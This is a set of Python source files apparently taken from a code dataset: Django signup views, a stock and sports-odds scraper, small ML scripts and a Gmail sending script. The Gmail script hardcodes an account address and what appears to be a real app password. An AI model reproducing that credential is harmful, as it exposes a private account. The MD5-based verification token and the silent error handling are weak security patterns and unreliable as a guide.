#\n#########################################################################################################\n\n nome = Nome(request.POST.get('nome'))\n estabelecimento = NomeEstabelecimento(request.POST.get('estabelecimento'))\n email = Email(request.POST.get('email'))\n telefone = Telefone(request.POST.get('telefone'))\n usuario = NomeUsuario(request.POST.get('usuario'))\n senha = Senha(request.POST.get('senha'), request.POST.get('senharepetida'))\n captcha = Captcha(request.POST.get('g-recaptcha-response'))\n\n#########################################################################################################\n# monsta a variavel para levar os dados de volta para tela, caso #\n# algum dado tenha erro #\n#########################################################################################################\n\n variavel = Variavel({'nome': nome,\n 'nomeEstabelecimento': estabelecimento,\n 'email': email,\n 'telefone': telefone,\n 'usuario': usuario,\n 'senha': senha\n #'captcha': captcha\n })\n\n setSessionVariavel(request, variavel)\n\n#########################################################################################################\n# se tudo tiver com status de valido, cria o usuário djando de sistema #\n# esse é o usuário que é usado para fazer login no sistema #\n#########################################################################################################\n\n if (variavel.valida()):\n user = None\n try:\n nome.valor.strip(\" \")\n if \" \" in nome.valor:\n\n user = User.objects.create_user(username=usuario.valor, password= senha.valor,\n first_name= nome.valor.split(' ', 1)[0], last_name = nome.valor.split(' ', 1)[1])\n else:\n\n user = User.objects.create_user(username=usuario.valor, password= senha.valor,\n first_name= nome.valor, last_name = \"\")\n user.is_active = False\n user.save()\n except IntegrityError:\n message.erro(request, Text().usuario_mesmo_username())\n return HttpResponseRedirect(reverse('CADASTRAR'))\n except:\n message.erro(request, Text().erro_banco_criar_usuario)\n return HttpResponseRedirect(reverse('CADASTRAR'))\n\n#########################################################################################################\n# cria o objeto cadastro no banco de dados. 
O objeto cadastro é #\n# uma espécie de usuário temporário, guardando dados até que o #\n# cliente complete todos os estágios do cadastro #\n#########################################################################################################\n\n try:\n hash = hashlib.md5(email.valor)\n cadastroInicial = Cadastro(usuario = User.objects.get(username = usuario.valor),\n email = email.valor,\n nomeEstabelecimento = estabelecimento.valor,\n telefone = telefone.valor,\n hashcode = hash.hexdigest(),\n checado = False,\n )\n cadastroInicial.save()\n except IntegrityError as e:\n user.delete()\n message.erro(request, Text().usuario_email_repetido())\n return HttpResponseRedirect(reverse('CADASTRAR'))\n except Exception as e:\n user.delete()\n message.erro(request, Text().erro_banco_criar_usuario)\n return HttpResponseRedirect(reverse('CADASTRAR'))\n\n#########################################################################################################\n# envia o email para que o usuário possa validar seu cadastro inicial #\n#########################################################################################################\n try:\n SendEmail().email_cadastro(nome.valor, email.valor, hash)\n\n except Exception as e:\n coisa = e.message\n pass\n\n return HttpResponseRedirect(reverse('CADASTRAR_EMAILENVIADO'))\n\n else:\n message.erro(request, Text().dados_inconsistentes())\n return HttpResponseRedirect(reverse('CADASTRAR'))\n\n############################################################################################################\n############################################################################################################\n\n@login_required\ndef validarCadastroDadosPessoais(request):\n\n#########################################################################################################\n# busca toda as variáveis vindas da tela e monta as classes #\n#########################################################################################################\n\n nome = Nome(request.POST.get('nome'))\n sobrenome = Sobrenome(request.POST.get('sobrenome'))\n email = Email(request.POST.get('email'))\n cpf = CPF(request.POST.get('cpf'))\n telefone = Telefone(request.POST.get('telefone'))\n celular = Telefone(request.POST.get('celular'))\n\n#########################################################################################################\n# monsta a variavel para levar os dados de volta para tela, caso #\n# algum dado tenha erro #\n#########################################################################################################\n\n variavel = Variavel({'nome': nome,\n 'sobrenome': sobrenome,\n 'email': email,\n 'cpf': cpf,\n 'telefone': telefone,\n 'celular': celular})\n\n setSessionVariavel(request, variavel)\n\n#########################################################################################################\n# checa se já existe um usuário ou um cadastro com o CPF informado #\n#########################################################################################################\n\n try:\n\n usuario = Cadastro.objects.get(cpf=cpf)\n cad = Usuario.objects.get(cpf = cpf)\n\n if usuario or cad:\n message.erro(request, Text().usuario_cadastrado_cpf())\n return HttpResponseRedirect(reverse('LOGIN_PRINCIPAL'))\n except ObjectDoesNotExist:\n pass\n\n#########################################################################################################\n# se o usuário for novo, monta o objeto user do django e salva com todos os dados #\n# salva os demais 
dados no cadastro e seta o cadastro como completo #\n#########################################################################################################\n\n if variavel.valida():\n\n user = getUser(request)\n cadastro = getCadastro(request)\n\n try:\n userCadastrado = User.objects.get(id= user.id)\n userCadastrado.first_name = nome.valor\n userCadastrado.last_name = sobrenome.valor\n userCadastrado.save()\n\n cadastro.cpf = cpf.valor\n cadastro.telefone = telefone.valor\n cadastro.celular = celular.valor\n cadastro.cadastroDadosPessoaisCompleto = True\n cadastro.save()\n\n except IntegrityError as e:\n message.erro(request, Text().usuario_ja_existe())\n except Exception as e:\n message.erro(request, Text().erro_banco_criar_usuario())\n return HttpResponseRedirect(reverse('CADASTRAR_DADOS_PESSOAIS'))\n\n del request.session['variavel']\n return HttpResponseRedirect(reverse('CADASTRAR_ESTABELECIMENTO'))\n else:\n message.erro(request, Text().dados_inconsistentes())\n return HttpResponseRedirect(reverse('CADASTRAR_DADOS_PESSOAIS'))\n\n############################################################################################################\n############################################################################################################\n\n@login_required\ndef validarCadastroEstabelecimento(request):\n\n#########################################################################################################\n# busca toda as variáveis vindas da tela e monta as classes #\n#########################################################################################################\n\n nomeEstabelecimento = NomeEstabelecimento(request.POST.get('estabelecimento'))\n cnpj = CNPJ(request.POST.get('cnpj'))\n tipoEstabelecimento = TipoEstabelecimentoSelecionado(request.POST.get('tipoestabelecimento'))\n\n numero = Numero(request.POST.get('numero'))\n complemento = Complemento(request.POST.get('complemento'))\n\n#########################################################################################################\n# instancia a classe de CEP e conecta ao site dos correios para pegar os dados #\n# caso não consiga buscar os dados do correio, os dados informados pelo #\n# usuário na tela são os que vão ser salvos #\n#########################################################################################################\n\n cep = CEP(request.POST.get('cep'))\n\n if cep.dadosEndereco:\n rua = RuaBairroCidade(cep.dadosEndereco['logradouro'])\n bairro = RuaBairroCidade(cep.dadosEndereco['bairro'])\n cidade = RuaBairroCidade(cep.dadosEndereco['localidade'])\n estado = Estado(cep.dadosEndereco['uf'])\n else:\n rua = RuaBairroCidade(request.POST.get('rua'))\n bairro = RuaBairroCidade(request.POST.get('bairro'))\n cidade = RuaBairroCidade(request.POST.get('cidade'))\n estado = Estado(request.POST.get('estado'))\n\n#########################################################################################################\n# monsta a variavel para levar os dados de volta para tela, caso #\n# algum dado tenha erro #\n#########################################################################################################\n\n variavel = Variavel({'nomeEstabelecimento':nomeEstabelecimento,\n 'cnpj':cnpj,\n 'tipoEstabelecimento':tipoEstabelecimento,\n 'cep':cep,\n 'rua':rua,\n 'numero':numero,\n 'bairro': bairro,\n 'cidade':cidade,\n 'estado':estado,\n 'complemento': complemento})\n\n setSessionVariavel(request, 
variavel)\n\n#########################################################################################################\n# monsta o objeto estabelecimento e o salva #\n# e coloca o cadastro como completo #\n#########################################################################################################\n\n if variavel.valida():\n\n cadastroEstabelecimento = Estabelecimento(dono= request.user,\n nome = nomeEstabelecimento.valor,\n cnpj = cnpj.valor,\n cep = cep.valor,\n estado = estado.valor,\n cidade = cidade.valor,\n bairro = bairro.valor,\n rua = rua.valor,\n numero = numero.valor,\n complemento = complemento.valor,\n tipo = TipoEstabelecimento.objects.get(id = tipoEstabelecimento.valor))\n try:\n cadastroEstabelecimento.save()\n cadastro = getCadastro(request)\n\n cadastro.cadastroCompleto = True\n cadastro.save()\n\n except IntegrityError:\n message.erro(request, Text().ja_cadastrado(\"CNPJ\"))\n return HttpResponseRedirect(reverse('CADASTRAR_ESTABELECIMENTO'))\n except:\n message.erro(request, Text().erro_comunicacao_banco_dados())\n return HttpResponseRedirect(reverse('CADASTRAR_ESTABELECIMENTO'))\n\n#########################################################################################################\n# deleta os dados da variável, pois se o estabelecimento foi salvo, #\n# não existem erros e a tela de cadastro de estabeleicmento não será #\n# recarregada #\n#########################################################################################################\n\n del request.session['variavel']\n cadastro = getCadastro(request)\n\n#########################################################################################################\n# monta o objeto usuário. Esse objeto é o que guarda dados do usuário, #\n# mas no tem nada a ver com o objeto user, que é utilizado para fazer login no sistema # #\n#########################################################################################################\n #cria o usuário padrão do sistema para conseguir salvar o dono no banco de dados\n cargo = C_Cargo(Cargo(), Text().padrao())\n cargo.save(request)\n usuario = Usuario(usuario = cadastro.usuario,\n email = cadastro.email,\n estabelecimento = cadastroEstabelecimento,\n telefone = cadastro.telefone,\n celular = cadastro.celular,\n cpf = cadastro.cpf,\n dono = True,\n cargo = cargo.objeto\n )\n try:\n usuario.save()\n except Exception as e:\n teste = e.message\n message.erro(request, Text().erro_comunicacao_banco_dados())\n return HttpResponseRedirect(reverse('SISTEMA_PRINCIPAL'))\n\n#########################################################################################################\n# dá todas as permissões ao usuário que cadastrou o estabelecimento no sistema #\n#########################################################################################################\n\n modelos = django.apps.apps.get_models()\n user = User.objects.get(id = usuario.usuario.id)\n for modelo in modelos:\n try:\n permissoesCadastradas = modelo._meta.original_attrs['permissions']\n\n\n for permissao in permissoesCadastradas:\n objetoPermissao = Permission.objects.get(codename = permissao[0])\n user.user_permissions.add(objetoPermissao)\n except Exception as e:\n pass\n\n#########################################################################################################\n# retorna para a tela principal do sistema #\n#########################################################################################################\n\n message.mensagem(request, Text().cadastro_completo())\n 
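\n        # A quick sanity check of the permission grants above via Django's standard\n        # User.get_all_permissions() API, which returns a set of 'app_label.codename'\n        # strings; re-fetching the user sidesteps the per-instance permission cache.\n        # The granted_permissions name is an assumption made for this example.\n        granted_permissions = User.objects.get(id=usuario.usuario.id).get_all_permissions()\n        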
return HttpResponseRedirect(reverse('SISTEMA_PRINCIPAL'))\n\n else:\n message.erro(request, Text().dados_inconsistentes())\n return HttpResponseRedirect(reverse('CADASTRAR_ESTABELECIMENTO'))\n\n\n\n\n\n","sub_path":"DeBar/views/cadastro.py","file_name":"cadastro.py","file_ext":"py","file_size_in_byte":25939,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"35210571","text":"import numpy\nfrom dynamic_stage import Stage\n\ndef pv_cost(quantity, years_in_future):\n\t\"\"\"\n\t\tSo far just the quantity-based cost\n\t:param quantity:\n\t:param years_in_future:\n\t:return:\n\t\"\"\"\n\tcost = 100000*pow(quantity, 0.8)\n\tpv_cost = cost/pow((1+0.05), years_in_future)\n\treturn pv_cost\n\ndef run_problem2(num_years, needed_trucks=4, required=(0,1,1,2,2,2)):\n\tmatrix = [[0 for val in range(num_years)] for val in range(needed_trucks+1)]\n\n\t# make the initialization cost matrix\n\tfor year in range(num_years):\n\t\tfor index, row in enumerate(matrix):\n\t\t\t#if index >= required[year]:\n\t\t\t#\tneeded_now = index - required[year]\n\t\t\tmatrix[index][year] = pv_cost(index, year)\n\n\tmatrix_array = numpy.array(matrix) # make it a numpy array so we can easily take a vertical slice\n\n\tstages = []\n\tfor year in range(num_years):\n\t\tcost_list = matrix_array[1:, year] # pull the column out of the matrix corresponding to this year - remove the 0 value first row (should look into how this is getting there)\n\t\tyear_stage = Stage(name=\"Year {}\".format(year), cost_benefit_list=list(cost_list), calculation_function=min, selection_constraints=required)\n\t\tyear_stage.max_selections = needed_trucks\n\t\tyear_stage.number = year\n\t\tstages.append(year_stage)\n\n\tfor index, stage in enumerate(stages): # make the relationships now\n\t\tif index > 0:\n\t\t\tstages[index].previous = stages[index-1]\n\t\tif index+1 < len(stages): # if it's not the last one\n\t\t\tstages[index].next = stages[index+1]\n\n\tstages[-1].optimize()\n\tstages[0].get_optimal_values()\n\n\nrun_problem2(num_years=6)\n\n","sub_path":"p2_dynamic.py","file_name":"p2_dynamic.py","file_ext":"py","file_size_in_byte":1539,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"429731844","text":"\nfrom email.mime.multipart import MIMEMultipart\nfrom email.mime.text import MIMEText\ncontent = MIMEMultipart() #建立MIMEMultipart物件\ncontent[\"subject\"] = \"Python send-mail by Edison\" #郵件標題\ncontent[\"from\"] = \"edison3.lin@gmail.com\" #寄件者\ncontent[\"to\"] = \"b82506001@gmail.com\" #收件者\ncontent.attach(MIMEText(\"Demo python send email\")) #郵件內容\n\n\nimport smtplib\nwith smtplib.SMTP(host=\"smtp.gmail.com\", port=\"587\") as smtp: # 設定SMTP伺服器\n try:\n smtp.ehlo() # 驗證SMTP伺服器\n smtp.starttls() # 建立加密傳輸\n smtp.login(\"edison3.lin@gmail.com\", \"nhgw qgvw aszm fdmd\") # 登入寄件者gmail\n smtp.send_message(content) # 寄送郵件\n print(\"Complete!\")\n except Exception as e:\n print(\"Error message: \", e)\n","sub_path":"gmail.py","file_name":"gmail.py","file_ext":"py","file_size_in_byte":805,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"49871422","text":"from django.urls import path\nfrom . 
import views\n\napp_name='mainblog'\n\nurlpatterns = [\n path('home/', views.home_view, name='home'),\n path('login/', views.login_view, name='login'),\n path('signup/', views.signup_view, name='signup'),\n path('menu/', views.menu_view, name='menu'),\n path('menu/cliente', views.client_view, name='clients'),\n path('menu/proveedor', views.provider_view, name='providers'),\n path('menu/clientes', views.clientes_view, name=\"allclients\"),\n path('producto/anadir', views.create_prod, name=\"createprod\"),\n path('menu/proveedores', views.proveedores_view, name=\"allproviders\"),\n]","sub_path":"mainblog/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":630,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"267014045","text":"import torchvision.models as models\nimport torch.nn as nn\nimport torch\nimport numpy as np\nimport torch.nn.init\nimport torch.nn.functional as F\nfrom collections import OrderedDict\n\n\"\"\"Layers model in which output layers are tranformed to same dimension with a weight matrix instead of padding\"\"\"\nclass LayersModelSame(nn.Module):\n def __init__(self, img_dim=4096, embed_size=1024, trained_dresses=False, checkpoint_path=None):\n super(LayersModelSame, self).__init__()\n net = models.alexnet(pretrained=True)\n if trained_dresses:\n print(\"Loading pretrained model on dresses\")\n checkpoint = torch.load(checkpoint_path)\n weights = checkpoint[\"model\"]\n del weights['classifier.6.weight']\n del weights['classifier.6.bias']\n net.load_state_dict(checkpoint[\"model\"], strict=False)\n\n self.relu = nn.ReLU(inplace=False)\n self.a = net.features[0]\n self.b = net.features[2]\n self.c = net.features[3]\n self.d = net.features[5]\n self.e = net.features[6] #\n self.f = net.features[8] #\n self.g = net.features[10] #\n self.h = net.features[12] #\n self.i = net.avgpool #\n self.j = net.classifier[0]\n self.k = net.classifier[1] #\n self.l = net.classifier[3]\n self.m = net.classifier[4] #\n self.fc1 = nn.Linear(192, embed_size)\n self.fc2= nn.Linear(384, embed_size)\n self.fc3 = nn.Linear(256, embed_size)\n self.fc4 = nn.Linear(256, embed_size)\n self.fc5 = nn.Linear(256, embed_size)\n self.fc6 = nn.Linear(img_dim, embed_size)\n self.fc7 = nn.Linear(img_dim, embed_size)\n self.fc = nn.Linear(img_dim, embed_size)\n\n self.init_weights()\n\n def forward(self, x):\n\n batch = x.shape[0]\n temp = []\n x = self.a(x)\n x = self.relu(x)\n x = self.b(x)\n x = self.c(x)\n\n y = flat(x)\n y = self.fc1(y)\n temp.append(y)\n\n x = self.relu(x)\n x = self.d(x)\n x = self.e(x) #\n\n y = flat(x)\n y = self.fc2(y)\n temp.append(y)\n\n x = self.relu(x)\n x = self.f(x) #\n\n y = flat(x)\n y = self.fc3(y)\n temp.append(y)\n\n x = self.relu(x)\n x = self.g(x) #\n\n y = flat(x)\n y = self.fc4(y)\n temp.append(y)\n\n x = self.relu(x)\n x = self.h(x) #\n\n y = flat(x)\n y = self.fc5(y)\n temp.append(y)\n\n x = self.i(x)\n x = self.j(x)\n x = x.view(batch ,-1)\n x = self.k(x) #\n y = self.fc6(x)\n temp.append(y)\n\n x = self.relu(x)\n x = self.l(x)\n x = self.m(x) #\n y = self.fc7(x)\n temp.append(y)\n\n features = torch.stack(temp, dim=0).permute(1,0,2)\n\n return features\n\n\n def init_weights(self):\n \"\"\"Xavier initialization for the fully connected layer\n \"\"\"\n r = np.sqrt(6.) / np.sqrt(self.fc.in_features +\n self.fc.out_features)\n self.fc.weight.data.uniform_(-r, r)\n self.fc.bias.data.fill_(0)\n\n def load_state_dict(self, state_dict):\n \"\"\"Copies parameters. 
overwritting the default one to\n accept state_dict from Full model\n \"\"\"\n own_state = self.state_dict()\n new_state = OrderedDict()\n for name, param in state_dict.items():\n if name in own_state:\n new_state[name] = param\n\n super(LayersModelSame, self).load_state_dict(new_state)\n\ndef flat(x):\n batch = x.shape[0]\n n_channel = x.shape[1]\n dim = x.shape[2]\n pool = nn.AvgPool2d((dim, dim))\n # pool = nn.MaxPool2d((dim, dim))\n x = pool(x)\n x = x.view(batch, -1)\n return x\n","sub_path":"comb/util/layers_model_same.py","file_name":"layers_model_same.py","file_ext":"py","file_size_in_byte":3766,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"601405662","text":"import lxml.html\nimport openpyxl as xl\nimport requests\nimport datetime\nimport pandas_datareader.data as web\nimport os\nfrom yahoo import YahooStats\nfrom tqdm import trange as timer\nimport tqdm\nfrom openpyxl.styles import PatternFill\nimport xlrd\nfrom openpyxl.workbook import Workbook\n\ndef cvt_xls_to_xlsx(src_file_path, dst_file_path):\n book_xls = xlrd.open_workbook(src_file_path)\n book_xlsx = Workbook()\n\n sheet_names = book_xls.sheet_names()\n for sheet_index, sheet_name in enumerate(sheet_names):\n sheet_xls = book_xls.sheet_by_name(sheet_name)\n if sheet_index == 0:\n sheet_xlsx = book_xlsx.active\n sheet_xlsx.title = sheet_name\n else:\n sheet_xlsx = book_xlsx.create_sheet(title=sheet_name)\n\n for row in range(0, sheet_xls.nrows):\n for col in range(0, sheet_xls.ncols):\n sheet_xlsx.cell(row = row+1 , column = col+1).value = sheet_xls.cell_value(row, col)\n\n book_xlsx.save(dst_file_path)\n\n# if os.path.exists('StockScreen.xls') == True:\ncvt_xls_to_xlsx('StockScreen.xls', 'StockScreen.xlsx')\nwb = xl.load_workbook('StockScreen.xlsx')\nsheet = wb.active\n\nrows = list(range(4, 24)) + list(range(26, 30)) + list(range(32, 38)) + list(range(40, 51))\nfor i in tqdm.tqdm(list(range(4, 24)) + list(range(26, 30)) + list(range(32, 38)) + list(range(40, 51)), desc='Processing'):\n tick = sheet['B' + str(i)].value\n\n stock = tick.split('.')\n if len(stock) > 1:\n stock = tick.split('.')[0] + '-' + tick.split('.')[1]\n data = web.DataReader(stock.upper(), 'yahoo', str(sheet['C3'].value), str(sheet['D3'].value))\n titles, values = YahooStats(stock)\n else:\n data = web.DataReader(tick.upper(), 'yahoo', str(sheet['C3'].value), str(sheet['D3'].value))\n titles, values = YahooStats(tick)\n\n sheet['C' + str(i)] = data.Close[0]\n sheet['D' + str(i)] = data.Close[len(data.Close) - 1]\n\n #WRITES 52-WEEK HIGH\n # sheet['C' + str(i)] = values[5][values[5].index('-') + 2:]\n\n\n\n #WRITES % DD\n if i >= 6:\n url = \"https://in.finance.yahoo.com/quote/\" + tick.upper()\n doc = lxml.html.fromstring(requests.get(url).content)\n right_summary = doc.xpath('//div[@data-test=\"right-summary-table\"]')[0]\n row = right_summary.xpath('.//td[@class=\"C($primaryColor) W(51%)\"]')[5]\n\n if 'yield' in row.xpath('.//span/text()')[0]:\n sheet['F' + str(i)] = values[13][values[13].index('(') + 1: len(values[13]) - 1]\n else:\n sheet['F' + str(i)] = 'N/A'\n\n #WRITES PUT/CALL\n if i >= 6:\n url = 'https://www.alphaquery.com/stock/' + str(tick.upper()) + '/volatility-option-statistics/30-day/put-call-ratio-volume'\n doc = lxml.html.fromstring(requests.get(url).content)\n below_chart = doc.xpath('//div[@id=\"below-chart-text\"]')[0]\n sheet['I' + str(i)] = below_chart.xpath('.//strong/text()')[0]\n\n # WRITES PREVIOUS CLOSE\n sheet['E' + str(i)] = values[0]\n\n #WRITES CURRENT PE\n if i 
>= 6:\n        sheet['K' + str(i)] = values[10]\n\n    # Writes ROIC\n    if i >= 6:\n        url = 'https://www.gurufocus.com/term/ROIC/' + str(tick.upper()) + '/ROIC-Percentage/'\n        doc = lxml.html.fromstring(requests.get(url).content)\n        header = doc.xpath('//div[@id=\"def_body_detail_height\"]')[0]\n        sheet['L' + str(i)] = header.xpath('.//font/text()')[0].split(' ')[1]\n\n\nsheet['C2'] = datetime.datetime.today().strftime('%e-%b-%y')\nhighlight = PatternFill(start_color='FAF60C', end_color='FAF60C', fill_type='solid')\nsheet['B2'].fill, sheet['E3'].fill, sheet['I3'].fill, sheet['K3'].fill, sheet['L3'].fill = highlight, highlight, highlight, \\\n                                                                                          highlight, highlight\n\n\n\nwb.save('StockScreen.xlsx')","sub_path":"stock-screen.py","file_name":"stock-screen.py","file_ext":"py","file_size_in_byte":3810,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"223304924","text":"#Select statement, remove unicode characters\n\nimport sqlite3\n\nwith sqlite3.connect(\"new.db\") as connection:\n\tc = connection.cursor()\n\n\t# use a for loop to iterate through the database, printing the results line by line\n\n\tc.execute(\"SELECT firstname, lastname from employees\")\n\t\n\trows = c.fetchall()\n\n\t#output the rows to the screen, row by row\n\n\tfor r in rows:\n\n\t\tprint(r[0], r[1])\n\n\n\n\n\n\t\t","sub_path":"05_sql.py","file_name":"05_sql.py","file_ext":"py","file_size_in_byte":391,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"375857133","text":"import tensorflow as tf\nimport keras\n# import matplotlib.pyplot as plt\n\nclass myCallback(tf.keras.callbacks.Callback):\n    def on_epoch_end(self, epoch, logs={}): # called at the end of every epoch\n        if(logs.get('loss')<0.4):\n            print(\"\\nLoss is low so cancelling training!\")\n            self.model.stop_training = True\n\ncallbacks = myCallback()\n\nmnist = keras.datasets.fashion_mnist\n(training_images, training_labels), (test_images, test_labels) = mnist.load_data()\n\n# print the values of sample 0\n# plt.imshow(training_images[0])\n# print(training_labels[0])\n# print(training_images[0])\n\ntraining_images = training_images/255.0\ntest_images = test_images/255.0\n\nmodel = keras.Sequential([\n    keras.layers.Flatten(input_shape=(28,28)), # each image is 28x28 pixels\n    keras.layers.Dense(128, activation=tf.nn.relu),\n    keras.layers.Dense(10,activation=tf.nn.softmax) # 10 clothing classes, so the output is a probability for each class\n])\n\nmodel.compile(optimizer=tf.compat.v1.train.AdamOptimizer(),loss='sparse_categorical_crossentropy')\n\nmodel.fit(training_images,training_labels,epochs=5,callbacks=[callbacks])\n\nmodel.evaluate(test_images,test_labels)\n\n\n\n","sub_path":"Week 1/Fashion Mnist.py","file_name":"Fashion Mnist.py","file_ext":"py","file_size_in_byte":1172,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"196906205","text":"import tkinter as tk\nimport pandas as pd\nimport numpy as np\nfrom selenium import webdriver\nfrom bs4 import BeautifulSoup\nimport time\nimport lxml\n\ndef ball():\n    option = webdriver.ChromeOptions()\n    option.add_argument('headless')\n    driver = webdriver.Chrome(chrome_options=option,executable_path='.\\chromedriver.exe')\n    #driver = webdriver.PhantomJS()\n    url ='http://bkd99.net/'\n    driver.get(url)\n    time.sleep(2)\n    pageSource=driver.page_source\n    soup = BeautifulSoup(pageSource,'xml')\n\n    # Start to soup\n    test = soup.findAll('div',{'usefor':'row'})\n    
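# each 'row' div appears to hold one match: the team code plus the full-game and first-half odds cells parsed below\n    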
col=['All_RA','All_RA_Odds','All_RB','All_RB_Odds','All_DA','All_DA_Odds','All_DB_Odds','Half_RA','Half_RA_Odds','Half_RB','Half_RB_Odds','Half_DA','Half_DA_Odds','Half_DB_Odds']\n df = pd.DataFrame(columns=col)\n\n\n for i in test:\n try: \n team =(i.find('div',{'class':'cell team'}).text)\n if str(team[0:3]) in str(team[3:]):break\n team=team[0:3]\n temp = i.find('div',{'class':'cell R'})\n temp2= i.find('div',{'class':'cell OU'})\n temp3= i.find('div',{'class':'cell HR_R'})\n temp4= i.find('div',{'class':'cell HR_OU'})\n df.loc[team,'All_RA'] =temp.find('div',{'class':'css0'}).get_text(strip=True)\n if '平' in df.loc[team,'All_RA']:df.loc[team,'All_RA']=df.loc[team,'All_RA'][0:-1]\n df.loc[team,'All_RA_Odds'] =temp.find('div',{'class':'css1'}).get_text(strip=True)\n df.loc[team,'All_RB'] =temp.find('div',{'class':'css2'}).get_text(strip=True)\n if '平' in df.loc[team,'All_RB']:df.loc[team,'All_RB']=df.loc[team,'All_RB'][0:-1]\n df.loc[team,'All_RB_Odds'] =temp.find('div',{'class':'css3'}).get_text(strip=True)\n df.loc[team,'All_DA'] =temp2.find('div',{'class':'css0'}).get_text(strip=True)\n df.loc[team,'All_DA_Odds'] =temp2.find('div',{'class':'css1'}).get_text(strip=True)[1:]\n df.loc[team,'All_DB_Odds'] =temp2.find('div',{'class':'css3'}).get_text(strip=True)[1:]\n df.loc[team,'Half_RA'] =temp3.find('div',{'class':'css0'}).get_text(strip=True)\n if '平' in df.loc[team,'Half_RA']:df.loc[team,'Half_RA']=df.loc[team,'Half_RA'][0:-1]\n df.loc[team,'Half_RA_Odds'] =temp3.find('div',{'class':'css1'}).get_text(strip=True)\n df.loc[team,'Half_RB'] =temp3.find('div',{'class':'css2'}).get_text(strip=True)\n if '平' in df.loc[team,'Half_RB']:df.loc[team,'Half_RB']=df.loc[team,'Half_RB'][0:-1]\n df.loc[team,'Half_RB_Odds'] =temp3.find('div',{'class':'css3'}).get_text(strip=True)\n df.loc[team,'Half_DA'] =temp4.find('div',{'class':'css0'}).get_text(strip=True)\n df.loc[team,'Half_DA_Odds'] =temp4.find('div',{'class':'css1'}).get_text(strip=True)[1:]\n df.loc[team,'Half_DB_Odds'] =temp4.find('div',{'class':'css3'}).get_text(strip=True)[1:]\n except:continue\n\n df=df.sort_index()\n driver.close()\n df=df.replace('',np.nan)\n return df\ndef nine(line):\n line = line.split()\n date = line[0]\n\n matrix=[]\n j=-1\n for i in range(len(line)):\n if line[i]==date:\n matrix.append([])\n j+=1\n matrix[j].append(line[i])\n\n new=[]\n for i in range(len(matrix)):\n k=-10\n m=-10\n new.append([])\n for j in range(len(matrix[i])):\n if str(matrix[i][j])=='大':\n k=0\n if '單' in str(matrix[i][j]):\n m=3\n k=-10\n if j>2 and k<4 :\n if m>1:\n m-=1\n continue\n if '響尾蛇' in matrix[i][j]:matrix[i][j]='ARI'\n elif '馬林魚' in matrix[i][j]:matrix[i][j]='MIA'\n elif '小熊' in matrix[i][j]:matrix[i][j]='CHC'\n elif '道奇' in matrix[i][j]:matrix[i][j]='LAD'\n elif '落磯山' in matrix[i][j]:matrix[i][j]='COL'\n elif '舊金山巨人' in matrix[i][j]:matrix[i][j]='SFO'\n elif '華盛頓國民' in matrix[i][j]:matrix[i][j]='WSH'\n elif '費城人' in matrix[i][j]:matrix[i][j]='PHI'\n elif '釀酒人' in matrix[i][j]:matrix[i][j]='MIL'\n elif '紅人' in matrix[i][j]:matrix[i][j]='CIN'\n elif '老虎' in matrix[i][j]:matrix[i][j]='DET'\n elif '運動家' in matrix[i][j]:matrix[i][j]='OAK'\n elif '雙城' in matrix[i][j]:matrix[i][j]='MIN'\n elif '白襪' in matrix[i][j]:matrix[i][j]='CWS'\n elif '水手' in matrix[i][j]:matrix[i][j]='SEA'\n elif '金鶯' in matrix[i][j]:matrix[i][j]='BAL'\n elif '洛杉磯天使' in matrix[i][j]:matrix[i][j]='LAA'\n elif '紅襪' in matrix[i][j]:matrix[i][j]='BOS'\n elif '太空人' in matrix[i][j]:matrix[i][j]='HOU'\n elif '光芒' in matrix[i][j]:matrix[i][j]='TAM'\n elif '洋基' in 
matrix[i][j]:matrix[i][j]='NYY'\n elif '皇家' in matrix[i][j]:matrix[i][j]='KAN'\n elif '海盜' in matrix[i][j]:matrix[i][j]='PIT'\n elif '遊騎兵' in matrix[i][j]:matrix[i][j]='TEX'\n elif '教士' in matrix[i][j]:matrix[i][j]='SDG'\n elif '紅雀' in matrix[i][j]:matrix[i][j]='STL'\n elif '勇士' in matrix[i][j]:matrix[i][j]='ATL'\n elif '藍鳥' in matrix[i][j]:matrix[i][j]='TOR'\n elif '印地安人' in matrix[i][j]:matrix[i][j]='CLE'\n elif '大都會' in matrix[i][j]:matrix[i][j]='NYM'\n elif '廣島鯉魚' in matrix[i][j]:matrix[i][j]=str(matrix[i][j])[0:3]\n elif '讀賣巨人' in matrix[i][j]:matrix[i][j]=str(matrix[i][j])[0:3]\n elif '西武獅' in matrix[i][j]:matrix[i][j]=str(matrix[i][j])[0:3]\n elif '東北樂天鷹' in matrix[i][j]:matrix[i][j]=str(matrix[i][j])[0:3]\n elif '日本火腿' in matrix[i][j]:matrix[i][j]=str(matrix[i][j])[0:3]\n elif '千葉羅德' in matrix[i][j]:matrix[i][j]=str(matrix[i][j])[0:3]\n elif '養樂多燕子' in matrix[i][j]:matrix[i][j]=str(matrix[i][j])[0:3]\n elif '中日龍' in matrix[i][j]:matrix[i][j]=str(matrix[i][j])[0:3]\n new[i].append(matrix[i][j])\n k+=1\n\n index=[]\n for i in range(len(new)):\n if (('+'in str(new[i][3]))or ('-' in str(new[i][3]))):new[i].insert(5,np.nan)\n elif len(new[i][3])!=5 : \n if new[i][3]=='0' or new[i][3]*9==0:new[i].insert(5,'0')\n else:new[i].insert(5,np.nan)\n else: \n if new[i][4]=='0' or new[i][4]*9==0:new[i].insert(3,'0')\n else:new[i].insert(3,np.nan)\n if ('+'in str(new[i][12]) or '-'in str(new[i][12]) ):new[i].insert(14,np.nan)\n elif len(new[i][12])!=5 :\n if new[i][12]=='0' or new[i][12]*9==0:new[i].insert(14,'0')\n else:new[i].insert(14,np.nan)\n else: \n if new[i][13]=='0' or new[i][13]*9==0:new[i].insert(12,'0')\n else:new[i].insert(12,np.nan)\n index.append(new[i][0])\n \n \n\n df = 